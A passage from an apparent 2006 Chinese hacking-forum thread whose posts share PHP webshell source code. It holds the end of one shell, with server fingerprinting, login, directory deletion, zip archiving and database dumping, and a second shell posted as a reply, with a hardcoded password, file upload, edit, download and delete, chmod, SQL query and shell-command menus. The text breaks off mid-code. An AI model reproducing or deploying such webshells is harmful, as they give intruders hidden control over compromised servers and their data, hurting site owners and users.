 $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
 if ($dis_func == "") {
  $dis_func = "No";
 }else {
  $dis_func = str_replace(" ","<br>",$dis_func);
  $dis_func = str_replace(",","<br>",$dis_func);
 }
 $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
  $info = array(
   0  => array("服务器时间",date("Y年m月d日 h:i:s",time())),
   1  => array("服务器域名","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
   2  => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
   3  => array("服务器操作系统",PHP_OS),
   5  => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
   6  => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
   7  => array("Web服务端口",$_SERVER['SERVER_PORT']),
   8  => array("PHP运行方式",strtoupper(php_sapi_name())),
   9  => array("PHP版本",PHP_VERSION),
   10 => array("运行于安全模式",getphpcfg("safemode")),
   11 => array("服务器管理员",$adminmail),
   12 => array("本文件路径",__FILE__),

   13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")),
   14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")),
   15 => array("显示错误信息 display_errors",getphpcfg("display_errors")),
   16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")),
   17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
   18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")),
   19 => array("POST最大字节数 post_max_size",getphpcfg("post_max_size")),
   20 => array("允许最大上传文件 upload_max_filesize",$upsize),
   21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"),
   22 => array("被禁用的函数 disable_functions",$dis_func),
   23 => array("phpinfo()",$phpinfo),
   24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),

   25 => array("图形处理 GD Library",getfun("imageline")),
   26 => array("IMAP电子邮件系统",getfun("imap_close")),
   27 => array("MySQL数据库",getfun("mysql_close")),
   28 => array("SyBase数据库",getfun("sybase_close")),
   29 => array("Oracle数据库",getfun("ora_close")),
   30 => array("Oracle 8 数据库",getfun("OCILogOff")),
   31 => array("PREL相容语法 PCRE",getfun("preg_match")),
   32 => array("PDF文档支持",getfun("pdf_close")),
   33 => array("Postgre SQL数据库",getfun("pg_close")),
   34 => array("SNMP网络管理协议",getfun("snmpget")),
   35 => array("压缩文件支持(Zlib)",getfun("gzclose")),
   36 => array("XML解析",getfun("xml_set_object")),
   37 => array("FTP",getfun("ftp_login")),
   38 => array("ODBC数据库连接",getfun("odbc_close")),
   39 => array("Session支持",getfun("session_start")),
   40 => array("Socket支持",getfun("fsockopen")),
  );

 $tb->tableheader();
 echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
 $tb->tdbody('<b>查看PHP配置参数状况</b>','left','1','30','style="padding-left: 5px;"');
 $tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"');
 $tb->makehidden('do','viewphpvar');
 echo "</form>\n";
 $hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况');
 for ($a=0;$a<3;$a++) {
  $tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
?>
  <tr class="secondalt">
    <td>
      <table width="100%" border="0" cellpadding="0" cellspacing="0">
<?php
  if ($a==0) {
   for($i=0;$i<=12;$i++) {
    echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
   }
  } elseif ($a == 1) {
   for ($i=13;$i<=24;$i++) {
    echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
   }
  } elseif ($a == 2) {
   for ($i=25;$i<=40;$i++) {
    echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
   }
  }
?>
      </table>
    </td>
  </tr>
<?php
 }//for
echo "</table>";
}//end phpenv
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
  <tr>
    <td>Copyright (C) 2004 Security Angel Team [SYUE] All Rights Reserved.</td>
    <td align="right"><?php
 debuginfo();
 ob_end_flush(); 
 ?></td>
  </tr>
</table>
</center>
</body>
</html>

<?php

/*======================================================
函数库
======================================================*/

 // 登陆入口
 function loginpage() {
?>
<style type="text/css">
input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="hidden" name="do" value="login">
<input type="submit" value="Login">
</form>
<?php
  exit;
 }//end loginpage()

 // 页面调试信息
 function debuginfo() {
  global $starttime;
  $mtime = explode(' ', microtime());
  $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
  echo "Processed in $totaltime second(s)";
 }

 // 去掉转义字符
 function stripslashes_array(&$array) {
  while(list($key,$var) = each($array)) {
   if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
    if (is_string($var)) {
     $array[$key] = stripslashes($var);
    }
    if (is_array($var))  {
     $array[$key] = stripslashes_array($var);
    }
   }
  }
  return $array;
 }

 // 删除目录
 function deltree($deldir) {
  $mydir=@dir($deldir); 
  while($file=$mydir->read()) {   
   if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
    @chmod("$deldir/$file",0777);
    deltree("$deldir/$file");
   }
   if (is_file("$deldir/$file")) {
    @chmod("$deldir/$file",0777);
    @unlink("$deldir/$file");
   }
  }
  $mydir->close();
  @chmod("$deldir",0777);
  return (@rmdir($deldir)) ? 1 : 0;
 }

 // 判断读写情况
 function dir_writeable($dir) {
  if (!is_dir($dir)) {
   @mkdir($dir, 0777);
  }
  if(is_dir($dir)) {
   if ($fp = @fopen("$dir/test.txt", 'w')) {
    @fclose($fp);
    @unlink("$dir/test.txt");
    $writeable = 1;
   } else {
    $writeable = 0;
   }
  }
  return $writeable;
 }

 // 表格行间的背景色替换
 function getrowbg() {
  global $bgcounter;
  if ($bgcounter++%2==0) {
   return "firstalt";
  } else {
   return "secondalt";
  }
 }

 // 获取当前的文件系统路径
 function getPath($mainpath, $relativepath) {
  global $dir;
  $mainpath_info           = explode('/', $mainpath);
  $relativepath_info       = explode('/', $relativepath);
  $relativepath_info_count = count($relativepath_info);
  for ($i=0; $i<$relativepath_info_count; $i++) {
   if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
   if ($relativepath_info[$i] == '..') {
    $mainpath_info_count = count($mainpath_info);
    unset($mainpath_info[$mainpath_info_count-1]);
    continue;
   }
   $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
  } //end for
  return implode('/', $mainpath_info);
 }

 // 检查PHP配置参数
 function getphpcfg($varname) {
  switch($result = get_cfg_var($varname)) {
   case 0:
   return "No";
   break;
   case 1:
   return "Yes";
   break;
   default:
   return $result;
   break;
  }
 }

 // 检查函数情况
 function getfun($funName) {
  return (false !== function_exists($funName)) ? "Yes" : "No";
 }

 // 压缩打包类
 class PHPZip{
 var $out='';
  function PHPZip($dir) {
      if (@function_exists('gzcompress')) {
    $curdir = getcwd();
    if (is_array($dir)) $filelist = $dir;
          else{
           $filelist=$this -> GetFileList($dir);//文件列表
        foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
             }
          if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
    else chdir($curdir);
    if (count($filelist)>0){
     foreach($filelist as $filename){
      if (is_file($filename)){
       $fd = fopen ($filename, "r");
       $content = @fread ($fd, filesize ($filename));
       fclose ($fd);
          if (is_array($dir)) $filename = basename($filename);
       $this -> addFile($content, $filename);
      }
     }
     $this->out = $this -> file();
     chdir($curdir);
    }
    return 1;
   }
   else return 0;
  }

  // 获得指定目录文件列表
  function GetFileList($dir){
   static $a;
   if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
      if($file!='.' && $file!='..'){
                $f=$dir .'/'. $file;
                if(is_dir($f)) $this->GetFileList($f);
       $a[]=$f;
            }
     }
         closedir($dh);
       }
   }
   return $a;
  }

  var $datasec      = array();
     var $ctrl_dir     = array();
  var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
     var $old_offset   = 0;

  function unix2DosTime($unixtime = 0) {
         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
      if ($timearray['year'] < 1980) {
    $timearray['year']    = 1980;
          $timearray['mon']     = 1;
          $timearray['mday']    = 1;
       $timearray['hours']   = 0;
    $timearray['minutes'] = 0;
          $timearray['seconds'] = 0;
         } // end if
      return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
           ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
     }

  function addFile($data, $name, $time = 0) {
         $name     = str_replace('\\', '/', $name);

      $dtime    = dechex($this->unix2DosTime($time));
         $hexdtime = '\x' . $dtime[6] . $dtime[7]
                . '\x' . $dtime[4] . $dtime[5]
             . '\x' . $dtime[2] . $dtime[3]
          . '\x' . $dtime[0] . $dtime[1];
         eval('$hexdtime = "' . $hexdtime . '";');
      $fr   = "\x50\x4b\x03\x04";
   $fr   .= "\x14\x00";
         $fr   .= "\x00\x00";
      $fr   .= "\x08\x00";
   $fr   .= $hexdtime;

         $unc_len = strlen($data);
      $crc     = crc32($data);
   $zdata   = gzcompress($data);
         $c_len   = strlen($zdata);
      $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
   $fr      .= pack('V', $crc);
         $fr      .= pack('V', $c_len);
      $fr      .= pack('V', $unc_len);
   $fr      .= pack('v', strlen($name));
         $fr      .= pack('v', 0);
      $fr      .= $name;

   $fr .= $zdata;

         $fr .= pack('V', $crc);
      $fr .= pack('V', $c_len);
   $fr .= pack('V', $unc_len);

         $this -> datasec[] = $fr;
      $new_offset        = strlen(implode('', $this->datasec));

   $cdrec = "\x50\x4b\x01\x02";
         $cdrec .= "\x00\x00";
      $cdrec .= "\x14\x00";
   $cdrec .= "\x00\x00";
         $cdrec .= "\x08\x00";
      $cdrec .= $hexdtime;
   $cdrec .= pack('V', $crc);
         $cdrec .= pack('V', $c_len);
      $cdrec .= pack('V', $unc_len);
   $cdrec .= pack('v', strlen($name) );
         $cdrec .= pack('v', 0 );
      $cdrec .= pack('v', 0 );
   $cdrec .= pack('v', 0 );
         $cdrec .= pack('v', 0 );
      $cdrec .= pack('V', 32 );
   $cdrec .= pack('V', $this -> old_offset );
         $this -> old_offset = $new_offset;
      $cdrec .= $name;

   $this -> ctrl_dir[] = $cdrec;
     }

  function file() {
   $data    = implode('', $this -> datasec);
         $ctrldir = implode('', $this -> ctrl_dir);
      return
       $data .
    $ctrldir .
             $this -> eof_ctrl_dir .
          pack('v', sizeof($this -> ctrl_dir)) .
       pack('v', sizeof($this -> ctrl_dir)) .
    pack('V', strlen($ctrldir)) .
             pack('V', strlen($data)) .
          "\x00\x00";
     }
 }

 // 备份数据库
 function sqldumptable($table, $fp=0) {
  $tabledump = "DROP TABLE IF EXISTS $table;\n";
  $tabledump .= "CREATE TABLE $table (\n";

  $firstfield=1;

  $fields = mysql_query("SHOW FIELDS FROM $table");
  while ($field = mysql_fetch_array($fields)) {
   if (!$firstfield) {
    $tabledump .= ",\n";
   } else {
    $firstfield=0;
   }
   $tabledump .= "   $field[Field] $field[Type]";
   if (!empty($field["Default"])) {
    $tabledump .= " DEFAULT '$field[Default]'";
   }
   if ($field['Null'] != "YES") {
    $tabledump .= " NOT NULL";
   }
   if ($field['Extra'] != "") {
    $tabledump .= " $field[Extra]";
   }
  }
  mysql_free_result($fields);
 
  $keys = mysql_query("SHOW KEYS FROM $table");
  while ($key = mysql_fetch_array($keys)) {
   $kname=$key['Key_name'];
   if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
    $kname="UNIQUE|$kname";
   }
   if(!is_array($index[$kname])) {
    $index[$kname] = array();
   }
   $index[$kname][] = $key['Column_name'];
  }
  mysql_free_result($keys);

  while(list($kname, $columns) = @each($index)) {
   $tabledump .= ",\n";
   $colnames=implode($columns,",");

   if ($kname == "PRIMARY") {
    $tabledump .= "   PRIMARY KEY ($colnames)";
   } else {
    if (substr($kname,0,6) == "UNIQUE") {
     $kname=substr($kname,7);
    }
    $tabledump .= "   KEY $kname ($colnames)";
   }
  }

  $tabledump .= "\n);\n\n";
  if ($fp) {
   fwrite($fp,$tabledump);
  } else {
   echo $tabledump;
  }

  $rows = mysql_query("SELECT * FROM $table");
  $numfields = mysql_num_fields($rows);
  while ($row = mysql_fetch_array($rows)) {
   $tabledump = "INSERT INTO $table VALUES(";

   $fieldcounter=-1;
   $firstfield=1;
   while (++$fieldcounter<$numfields) {
    if (!$firstfield) {
     $tabledump.=", ";
    } else {
     $firstfield=0;
    }

    if (!isset($row[$fieldcounter])) {
     $tabledump .= "NULL";
    } else {
     $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
    }
   }

   $tabledump .= ");\n";

   if ($fp) {
    fwrite($fp,$tabledump);
   } else {
    echo $tabledump;
   }
  }
  mysql_free_result($rows);
 }

 class FORMS {
  function tableheader() {
   echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
  }

  function headerform($arg=array()) {
   global $dir;
   if ($arg[enctype]){
    $enctype="enctype=\"$arg[enctype]\"";
   } else {
    $enctype="";
   }
   if (!isset($arg[method])) {
    $arg[method] = "POST";
   }
   if (!isset($arg[action])) {
    $arg[action] = '';
   }
   echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
   echo "  <tr>\n";
   echo "    <td>".$arg[content]."</td>\n";
   echo "  </tr>\n";
   echo "  </form>\n";
  }

  function tdheader($title) {
   global $dir;
   echo "  <tr class=\"firstalt\">\n";
   echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">返回</a>]</b></td>\n";
   echo "  </tr>\n";
  }

  function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
   if ($bgcolor=='2') {
    $css="secondalt";
   } elseif ($bgcolor=='1') {
    $css="firstalt";
   } else {
    $css=$bgcolor;
   }
   $height = empty($height) ? "" : " height=".$height;
   $colspan = empty($colspan) ? "" : " colspan=".$colspan;
   echo "  <tr class=\"".$css."\">\n";
   echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
   echo "  </tr>\n";
  }

  function tablefooter() {
   echo "</table>\n";
  }

  function formheader($action='',$title,$target='') {
   global $dir;
   $target = empty($target) ? "" : " target=\"".$target."\"";
   echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
   echo "  <tr class=\"firstalt\">\n";
   echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">返回</a>]</b></td>\n";
   echo "  </tr>\n";
  }

  function makehidden($name,$value=''){
   echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
  }

  function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
   $css = ($css == 'input') ? " class=\"input\"" : "";
   $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
   return $input;
  }

  function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
   $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
   return $textarea;
  }

  function formfooter($over='',$height=''){
   $height = empty($height) ? "" : " height=\"".$height."\"";
   echo "  <tr class=\"secondalt\">\n";
   echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"确定\"></td>\n";
   echo "  </tr>\n";
   echo " </form>\n";
   echo $end = empty($over) ? "" : "</table>\n";
  }

  function makeselect($arg = array()){
   if ($arg[multiple]==1) {
    $multiple = " multiple";
    if ($arg[size]>0) {
     $size = "size=$arg[size]";
    }
   }
   if ($arg[css]==0) {
    $css = "class=\"input\"";
   }
   $select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
    if (is_array($arg[option])) {
     foreach ($arg[option] AS $key=>$value) {
      if (!is_array($arg[selected])) {
       if ($arg[selected]==$key) {
        $select .= "<option value=\"$key\" selected>$value</option>\n";
       } else {
        $select .= "<option value=\"$key\">$value</option>\n";
       }

      } elseif (is_array($arg[selected])) {
       if ($arg[selected][$key]==1) {
        $select .= "<option value=\"$key\" selected>$value</option>\n";
       } else {
        $select .= "<option value=\"$key\">$value</option>\n";
       }
      }
     }
    }
   $select .= "</select>\n";
   return $select;
  }
 }
?>

[此贴子已经被作者于2006-5-10 20:21:58编辑过]

收藏 分享 评分
回复 引用

订阅 TOP

Taboo

信息军队-下士
2#
发表于 2006-5-11 06:36 | 只看该作者

顶上去...

  偶又坐沙发...

 爽...
回复 引用

TOP

hack_k

信息军队-下士
3#
发表于 2006-5-11 10:33 | 只看该作者
是不错
回复 引用

TOP

飘忽的幽灵

信息军队-上等兵
4#
发表于 2006-5-14 07:31 | 只看该作者

给你补一个.

<?php
@set_time_limit(0);
@error_reporting(E_ERROR | E_WARNING | E_PARSE);
@ob_start();
$pagestarttime = microtime();

if (get_magic_quotes_gpc()) {
    $_GET = array_stripslashes($_GET);
    $_POST = array_stripslashes($_POST);
}

/////参数设置

$chkpassword = 1;//是否有密码验证

$my_password = "suiyuelianmeng";//设置密码,如果chkpassword为0,此处设置无效.

$cookit_time = 24;//设置cookie有效时间(单位:小时,注:一天24小时)

//////结束

?>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PHP-Web-admin(HOPOL版本)</title>
    <style type="text/css">
    <!--
    body,td,th, h1, h2 {
        font-size: 12px;
        font-family: sans-serif;
    }
    body {background-color: #F8F8F8;}
    .style1 {
        font-size: 12px;
        font-family: verdana, helvetica, sans-serif, 宋体;
        vertical-align: middle;
        border: 1px solid #000000;
    }
    .stylebtext2 {color: #990000;font-weight: bold;}
    .stylebtext3 {color: #FFFFFF;font-weight: bold;}
     a:link,a:visited,a:active {color:#336699; text-decoration: underline;}
     a:hover {COLOR: #990000;text-decoration: none;}
    table {border-collapse: collapse;}
    td, th { border: 1px solid #000000;}
    -->
</style>

<?

if($chkpassword == 1){
 @session_start();
 if ($_GET["action"] == "logout") {
  @session_unregister("smy_password");
  @session_destroy();
  @setcookie ("cmy_password","");
  echo "<script>function redirect(){window.location.replace(\"{$_SERVER['PHP_SELF']}\");}redirect();</script>";
 }
 if($_GET["action"] == "login"){
  if($my_password==$_POST["pmy_password"]){
   @session_register("smy_password");
   $_SESSION["smy_password"] = $my_password;
   @setcookie ("cmy_password",$my_password,time()+(3600*$cookit_time));
   echo "<script>function redirect(){window.location.replace(\"{$_SERVER['PHP_SELF']}\");}redirect();</script>";
  }
 }
 if (@session_is_registered("smy_password")||isset($_COOKIE["cmy_password"])){
  if (($_SESSION["smy_password"]!=$my_password)&&(!isset($_COOKIE["cmy_password"])||$_COOKIE["cmy_password"]!=$my_password))
   getloginpass();
 }else getloginpass();
}

if(!@get_cfg_var("register_globals")){
    foreach($_GET as $key => $val) $$key = $val;
    foreach($_POST as $key => $val) $$key = $val;
 foreach($_FILES as $key => $val) $$key = $val;
}

if(isset($df_path)){
    if (!file_exists($df_path)) $errordownload = "没找到文件";
    else {
        $df_name = basename($df_path);
        $df_fhd=fopen($df_path,"rb");
        if($df_fhd==false) $errordownload = "打开文件错误";
        else{
            Header("Content-type: application/octet-stream");
            Header("Accept-Ranges: bytes");
            Header("Accept-Length: ".filesize($df_path));
            Header("Content-Disposition: attachment; filename=".$df_name);
            echo fread($df_fhd,filesize($df_path));
            fclose($df_fhd);
            exit;
        }
    }
}

if(isset($gotodir)) if($gotodir != "") $dir=$gotodir;

if(!isset($action)) {
    $action = "dir";
    $dir = ".";
}

if(!isset($dir)) $dir = ".";

$rootdir = str_replace("\\\\","/",$_SERVER["DOCUMENT_ROOT"]);

if(isset($abspath)) $dir = gettruepath($dir);
else if(isset($unabspath)){
    $dir = gettruepath($dir);
    if(strstr($dir,$rootdir)) $dir = str_replace("$rootdir",".",$dir); 
    else $dir=".";
}
$rny="<font color=green><b>■</b></font>";$rnn="<font color=red><b>■</b></font>";

?>

<SCRIPT LANGUAGE="JavaScript">
function rusuredel(msg,url){
    smsg = "确实要删除文件(目录)[" + msg + "]吗?";
    if (confirm(smsg)){
        url = url + msg;
        window.location = url;
    }
}

function rusurechk(msg,url){
    smsg = "源文件(目录,属性)为[" + msg + "],请输入目标文件(目录,属性):";
    re = prompt(smsg,msg);
    if (re){
        url = url + re;
        window.location = url;
    }
}
</script>
</head>
<body>

<table width="100%" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td align="center" width="100%" bgcolor="#000000" class="stylebtext3">
            欢迎使用PHP-WEB-ADMIN(hopol版本)【切莫用于任何非法途径否则后果自负】
        </td>
    </tr>
    <tr>
        <td align="center" bgcolor="#EEEEEE">
            本文件绝对路径:<? $stmp =str_replace("\\","/", __FILE__);echo "【<a href=\"$HTTP_SERVER_VARS[PHP_SELF]\">$stmp</a>】";?>【<a href="?action=logout">点此注销会话</a>】
        </td>
    </tr>
    <tr>
        <td align="center"  bgcolor="#EEEEEE">【<a href="?action=dir&dir=.">文件管理</a>】【<a href="?action=editfile&dir=<?=urlencode($dir);?>&editfile=<?=urlencode($dir);?>/">文本编辑器</a>】【<a href="?action=sql">数据库查询</a>】【<a href="?action=shell">Shell命令</a>】【<a href="?action=env">环境变量</a>】【<a href="?action=phpinfo">PHP系统信息</a>】【<a href="http://bbs.18883.net">查看更新</a>】
        </td>
    </tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
 <tr>
  <td width="100%" bgcolor="#000000" align="center" class="stylebtext3">
<?if($action == "dir"){?>
 文件管理
 </td>
 </tr>

 <tr>
 <form method="post" action="?action=dir&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
 <td bgcolor="#EEEEEE">&nbsp;当前目录:&nbsp;
 <input name="gotodir" type="text" class="style1" value="<?=$dir?>" size="60">&nbsp;
 <input name="gotodirb" type="submit" class="style1" value="跳转"><?if($dir[1] == ':') echo "【<a href=\"?action=dir&dir=".urlencode($dir)."&unabspath=1\">点此用<b>相对</b>路径查看</a>】&nbsp;";else echo "【<a href=\"?action=dir&dir=".urlencode($dir)."&abspath=1\">点此用<b>绝对</b>路径查看</a>】&nbsp;";?>
 </td>
 </form>
 </tr>

 <tr>
 <form method="post" action="?action=fileup&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
 <td bgcolor="#EEEEEE">&nbsp;文件上传到(目录):
 <input name="filedir" type="text" class="style1" value="<?=$dir?>" size="30">&nbsp;本地文件:
 <input name="userfile" type="file" class="style1" size="30">&nbsp;
 <input name="userfileb" type="submit" class="style1" value="上传">
 </td>
 </form>
 </tr>

 <tr>
 <form method="post" action="?action=filecreate&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
 <td bgcolor="#EEEEEE">&nbsp;新建文件(目录)在当前目录:&nbsp;
 <input name="mkname" type="text" value="" size=30 class="style1">&nbsp;
 <input name="mkfileb" type="submit" value="新建文件" class="style1">&nbsp;
 <input name="mkdirb" type="submit" value="新建目录" class="style1">&nbsp;当前目录状态:【<b><?$write = "不可写";if(is_dir($dir)) {if ($fp = @fopen("$dir/temp.tmp", 'w')) {@fclose($fp);@unlink("$dir/temp.tmp");$write = "可写";}}echo "$write</b>】";?>
 </td>
 </tr>
 </table>

 <table width="100%" border="0" cellpadding="0" cellspacing="0">
 <tr bgcolor="#000000" class="stylebtext3">
  <td width="25%">文件名</td>
  <td width="40%">建立时间|最后修改时间</td>
  <td width="10%">大小(KB)</td>
  <td width="8%">属性</td>
  <td width="17%">操作</td>
 </tr>
 <?php
 $filesum=0;$dirsum=0;$color="#EEEEEE";
 $dirs=@opendir($dir);
 while ($lop_fname=@readdir($dirs)){
  if(@is_dir("$dir/$lop_fname")){
   $lop_fsize = "-";
   $lop_fcdata = "-";
   $lop_fmdata = "-";
   $lop_foper="-";
   $lop_ftype="-";
   if($lop_fname==".."){
    if($dir == ".") continue;
    $dirb=@dirname($dir);
    if($dir[1] ==':'){
     $dirb = gettruepath($dirb);
     if(strlen($dirb) <=3) $dirb = substr($dirb,0,2);
    }
    $bp="△ ";
    $lop_fname = "上级目录";
   }else if($lop_fname=="."){
    if($dir == ".") continue;
    $dir[1] ==':'?$dirb = substr(gettruepath($dirb),0,2):$dirb=$lop_fname;
    $bp="○ ";
    $lop_fname = "根级目录";
   }else{
    $lop_fsize = "[DIR]";
    $dirb="$dir/$lop_fname";   
    $lop_fcdata = @date("Y-n-d H:i:s",@filectime("$dirb"));
    $lop_fmdata = @date("Y-n-d H:i:s",@filemtime("$dirb"));
    $lop_ftype= substr(@base_convert(@fileperms($dirb),10,8),-4);
    $bp="□ ";
    $title = "点击进入文件夹[$lop_fname]";
    $lop_foper= "[<a href=\"删除\" title=\"删除整个文件夹\" onClick=\"rusuredel('$dirb','?action=filedel&dir=$dir&deldir=');return false;\">删</a>|".
       "<a href=\"重命名\" title=\"重命名\" onClick=\"rusurechk('$dirb','?action=filerename&dir=$dir&renamef=$dirb&renamet=');return false;\">重</a>|".
       "<a href=\"拷贝\" title=\"拷贝\" onClick=\"rusurechk('$dirb','?action=filecopy&dir=$dir&copydirf=$dirb&copydirt=');return false;\">拷</a>|".
       "<a href=\"属性\" title=\"修改属性\" onClick=\"rusurechk('$lop_ftype','?action=filetype&dir=$dir&ctype=');return false;\">属</a>]";
    $dirsum++;
   }
   $color=ch_color($color);
   echo    "<tr bgcolor=\"$color\">".
       "<td width=\"25%\">$bp [<a href=\"?action=dir&dir=$dirb\" title = \"进入\">$lop_fname</a>]</td>".
       "<td width=\"40%\">[$lop_fcdata|$lop_fmdata]</td>".
       "<td width=\"10%\">$lop_fsize</td>".
       "<td width=\"8%\">$lop_ftype</td>".
       "<td width=\"17%\">$lop_foper</td>".
      "</tr>";
  }
 }
 @closedir($dirs);
 $dirs=@opendir($dir);
 while ($lop_fname=@readdir($dirs)){
  if(!@is_dir("$dir/$lop_fname")&&$lop_fname!=".."){
   $lop_ftype= substr(@base_convert(@fileperms("$dir/$lop_fname"),10,8),-4);
   $lop_foper= "[<a href=\"删除\" title=\"删除\" onClick=\"rusuredel('$dir/$lop_fname','?action=filedel&dir=$dir&delfile=');return false;\">删</a>|".
      "<a href=\"重命名\" title=\"重命名\"  onClick=\"rusurechk('$dir/$lop_fname','?action=filerename&dir=$dir&renamef=$dir/$lop_fname&renamet=');return false;\">重</a>|".
      "<a href=\"拷贝\" title=\"拷贝\" onClick=\"rusurechk('$dir/$lop_fname','?action=filecopy&dir=$dir&copyfilef=$dir/$lop_fname&copyfilet=');return false;\">拷</a>|".
      "<a href=\"属性\" title=\"修改属性\" onClick=\"rusurechk('$lop_ftype','?action=filetype&dir=$dir&cfile=$dir/$lop_fname&ctype=');return false;\">属</a>|".
      "<a href=\"?action=dir&df_path=$dir/$lop_fname\" title=\"下载\">下</a>|".
      "<a href=\"?action=editfile&dir=$dir&editfile=$dir/$lop_fname\" title=\"编辑\">编</a>]";
   $color=ch_color($color);
   echo    "<tr bgcolor=\"$color\">".
       "<td width=\"25%\">■ <a href=\"$dir/$lop_fname\" title = \"新窗口中打开\" target=\"_blank\">$lop_fname</a></td>".
       "<td width=\"40%\">[".@date("Y-n-d H:i:s",@filectime("$dir/$lop_fname"))."|".@date("Y-n-d H:i:s",@filemtime("$dir/$lop_fname"))."]</td>".
       "<td width=\"10%\">".@number_format(@filesize("$dir/$lop_fname")/1024,3)."</td>".
       "<td width=\"8%\">".$lop_ftype."</td>".
       "<td width=\"17%\">$lop_foper</td>".
      "</tr>";
   $filesum++;
  }
 }
 @closedir($dirs);
 ?>           
 <tr bgcolor="#000000" class="stylebtext3" align="center">
  <td width="25%" colspan="5">目录数:<?=$dirsum?>,文件数:<?=$filesum?></td>
 </tr>
 </table>     
<?}else if ($action == "editfile"){?>
 文本编辑器(若目标文件不存在将新建新文件)
 </td>
 </tr>

 <tr>
 <form method="post" action="?action=filesave&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
  <td align="center" valign="top" bgcolor="#EEEEEE">当前编辑文件名:
   <input name="editfilename" type="text" class="style1" value="<?=$editfile?>" size="30">
   <input name="editbackfile" type="checkbox" value="1" class="style1">生成备份文件(原文件.bak)<br>
   <textarea name="editfiletext" cols="120" rows="25" class="style1"><?
    $fd = @fopen($editfile, "rb");
    $fd==false?$readfbuff = "读取文件错误(或尚未读取文件).":$readfbuff = @fread($fd, filesize($editfile));
    @fclose( $fd );
    $readfbuff = htmlspecialchars($readfbuff);
    echo "$readfbuff";
   ?></textarea><p>
   <input name="editfileb" type="submit" value="提交" class="style1">&nbsp;&nbsp;
   <input name="editagainb" type="reset" value="重置" class="style1">
   <a href="?action=dir&dir=<?=urlencode($dir);?>">点此返回文件浏览页面</a>
   <p>
  </td>
 </form>
 </tr>
 </table>
<?}else if("sql" == substr($action,0,3)){?>
 数据库查询
 </td>
 </tr>
 
 <tr>
